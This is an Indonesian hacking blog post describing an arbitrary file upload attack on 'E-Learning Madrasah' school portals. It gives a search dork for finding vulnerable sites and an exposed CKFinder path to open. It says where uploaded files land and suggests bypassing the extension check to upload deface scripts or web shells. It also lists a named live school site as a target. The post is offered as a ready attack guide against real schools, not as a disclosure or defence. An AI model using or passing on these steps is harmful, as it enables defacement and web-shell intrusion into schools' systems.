E-Learning Madrasah - (AFU)

Januari 13, 2021

E-Learning Madrasah - Arbitary File Upload

Dork:
intitle:E-Learning Madrasah - Halaman Login

Step
-Dorkng

-Pilih target lu
-Kasih exploit (exploitnya ada di bawah)
-Lu cari tulisan Upload nah tinggal upload deh selesai.

Ini cuman bisa upload file.txt ama gambar
Dan kalau mau upload sc deface/shell, lu coba aja akalin ditamper kek atau bypass Extension

Vulnerability? https://site.sch.id/__statics/ckdrive/ckfinder.html

Exploit:
__statics/ckdrive/ckfinder.html

Location File? http://yourtarget.sch.id/__statics/gudangsoal/files/yourfile.txt

Live Target
http://eleaning.manbatam.sch.id:8094/__statics/ckdrive/ckfinder.html

Sorry ga ada gambar gw mager
Kalian pasti bisa lh walaupun berupa text.

Blog - Hacker Patah Hati

E-Learning Madrasah - (AFU)

2 komentar